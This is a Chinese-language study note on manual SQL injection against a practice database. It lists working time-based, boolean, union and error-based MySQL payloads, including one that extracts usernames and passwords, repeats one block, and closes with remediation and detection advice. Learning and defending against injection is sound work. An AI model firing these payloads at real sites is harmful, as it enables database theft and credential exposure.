文件名称:sql手注笔记.docx
以下语句均以 id 参数被直接拼接进 SQL 为前提(示例库名 security 为练习环境)。

延时注入(页面无回显,靠响应时间判断条件真假:条件为假时执行 sleep(5))
?id=1' and if(ascii(substr(database(),1,1))>90,1,sleep(5))--+
?id=1'and If(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101,1,sleep(5))--+
其中的子查询:
select table_name from information_schema.tables where table_schema='security' limit 0,1

盲注(布尔型,靠页面内容是否变化判断条件真假)
Left
?Id=1 and 1=left(database(),1)=5--+
Substr
?Id=1 and ascii(substr(database(),1,1))>90--+
Regexp
?id=1' and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^[a-z]' limit 0,1)--+

联合注入(页面有回显,查询结果直接显示在页面上)
id=-1 ' union select 1,schema_name,3 from information_schema.schemata --+
id=-1' union select 1,table_name,3 from information_schema.tables where table_name='security'--+
id=-1' union select username,password,3 from users where id=2--+

备注
limit 0,1:修改第一个数字以选择第几个数据表
substr(database,1,1):修改第二个参数以选择第几个字母
Mysql_set_charset('gbk','$conn'):PHP 侧把连接字符集设为 GBK;笔记未说明用途,推测与宽字节注入有关。

Left
?Id=1 and 1=left(database(),1)=5--+
Substr
?Id=1 and ascii(substr(database(),1,1))>90--+
Regexp
?id=1' and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^[a-z]' limit 0,1)--+

报错注入(依赖页面输出数据库错误信息)
?Id=1' and extractvalue(1,concat(0x7e,(select @@version),0x7e))--+
@@basedir
lines terminated by

防御要点:上述各类注入的根因相同,即参数未经处理就拼接进查询。对 id 使用参数化查询(预编译语句)并做整数类型校验即可从根本上消除;不要向页面输出数据库报错信息;应用使用的数据库账号按最小权限授予,不授予 FILE 权限;连接字符集统一使用 utf8mb4,不依赖 addslashes 类转义。检测时可关注请求参数中出现的 sleep(、information_schema、union select、extractvalue(,以及响应时间异常偏长的请求。